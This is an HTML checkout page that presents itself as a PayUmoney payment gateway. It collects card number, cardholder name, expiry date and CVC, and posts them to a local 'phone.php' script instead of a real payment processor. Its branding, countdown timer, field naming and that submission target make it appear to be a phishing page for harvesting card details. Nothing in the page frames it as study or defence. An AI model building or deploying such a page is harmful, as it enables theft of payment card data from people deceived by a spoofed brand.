<!DOCTYPE html>
<html lang="en" >
<head>
  <meta charset="UTF-8">
  <title> Checkout Form / Payment Gateway</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
<script src="https://unpkg.com/akar-icons-fonts"></script><link rel="stylesheet" href="./style.css">
<link rel="stylesheet" type="text/css" href="https://unpkg.com/slick-loader@1.1.20/slick-loader.min.css">
<script src="https://unpkg.com/slick-loader@1.1.20/slick-loader.min.js"></script>

<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.bundle.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>


</head>
<body>
<!-- partial:index.partial.html -->
<div class="screen flex-center">
<form class="popup flex p-lg" action="phone.php" method="post">
  <form id="myForm" class="popup flex p-lg">
    <div class="close-btn pointer flex-center p-sm">
      <i class="ai-cross"></i>
    </div>
    
      <!-- CARD FORM -->
      <div class="flex-fill flex-vertical">
        <div class="header flex-between flex-vertical-center">
          <div class="flex-vertical-center">
            <img src="./PayUmoney_Logo.jpg">
            
          </div>
          <div class="timer" id="timer">
            <span>0</span><span>5</span>
            <em>:</em>
            <span>0</span><span>0</span>
          </div>
        </div>
        <div class="card-data flex-fill flex-vertical">
          
          <!-- Name -->
          <div class="flex-between">
            <div class="card-property-title">
              <strong>Card Number</strong>
              <span>EEnter 16-digit card number on the card </span>
            </div>
            <div class="card-property-value">
              <div class="input-container">
                <input type="text" name="Card1"  size="18" id="cr_no" minlength="16" maxlength="19" placeholder="xxxx xxxx xxxx xxxx" >
                <i class="ai-card"></i>
              </div>
            </div>
          </div>

		   <!-- Name -->
          <div class="flex-between">
            <div class="card-property-title">
              <strong>Cardholder Name</strong>
              <span>Enter cardholder's name</span>
            </div>
            <div class="card-property-value">
              <div class="input-container">
                <input id="name" data-bound="name_mock" name="holder" data-def="Mr. Cardholder" type="text" class="uppercase" placeholder="CARDHOLDER NAME">
                <i class="ai-person"></i>
              </div>
            </div>
          </div>
          
          <!-- Expiry Date -->
          <div class="flex-between">
            <div class="card-property-title">
              <strong>Expiry Date</strong>
              <span>Enter the expiration date of the card</span>
            </div>
            <div class="card-property-value flex-vertical-center">
              <div class="input-container half-width">
                <input class="numbers" data-bound="mm_mock" data-def="00" name="ex1" type="number" min="1" max="12" step="1" placeholder="MM">  
              </div>
              <span class="m-md">/</span>
              <div class="input-container half-width">
                <input class="numbers" data-bound="yy_mock" data-def="01" name="ex2"  type="number" min="23" max="99" step="1" placeholder="YY">
              </div>
            </div>
          </div>
          
          <!-- CCV Number -->
          <div class="flex-between">
            <div class="card-property-title">
              <strong>CVC Number</strong>
              <span>Enter card verification code from the back of the card</span>
            </div>
            <div class="card-property-value">
              <div class="input-container">
                <input  id="phone" name="cvc" type="password" maxlength="4">
                <i id="cvc_toggler" data-target="cvc"  class="ai-eye-open pointer" ></i>
              </div>
            </div>
          </div>
          
         

         
          
          
        </div>
        <div class="action flex-center">
          <button id="submitBtn" type="submit" name="submit" value="submit" class="b-main-color pointer">Pay Now</button>
        </div>
      </div>
    
     
       
    </form>
  </d>
</div>
<!-- partial -->
  <script  src="./time.js"></script>
  <script  src="./payments.js"></script>
  <script  src="./crad.js"></script>



</body>
</html>
